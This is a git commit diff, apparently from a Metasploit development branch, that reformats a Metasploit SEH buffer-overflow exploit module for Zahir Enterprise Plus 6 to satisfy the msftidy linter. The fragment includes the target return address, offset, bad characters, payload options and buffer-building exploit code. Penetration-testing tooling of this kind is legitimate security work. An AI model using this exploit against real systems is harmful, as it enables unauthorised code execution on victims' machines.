Fixing for msftidy

Fixing some format because still throw errors
GSoC/Meterpreter_Web_Console
Thomas Gregory 2018-10-03 18:55:29 +07:00
parent cb5d68b641
commit 991ac3c671
1 changed files with 7 additions and 4 deletions

View File

@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
[
'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
{
'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
#P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
'Ret' => 0x52016661,
'Offset' => 3041
}
]
@ -42,7 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 5000,
'BadChars' => "\x00\x0a\x0d\x22\x2c"
'BadChars' => "\x00\x0a\x0d\x22\x2c",
'DisableNops' => true,
'StackAdjustment' => -3500
},
'Privileged' => false,
'DisclosureDate' => 'Sep 28 2018',
@ -57,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
buf = rand_text_alpha_upper(target['Offset'])
buf << "\n\r" # crash chars
buf << "\r\n" # crash chars
buf << rand_text_alpha_upper(380) # extra chars to hit the offset
buf << generate_seh_record(target.ret)
buf << make_nops(12)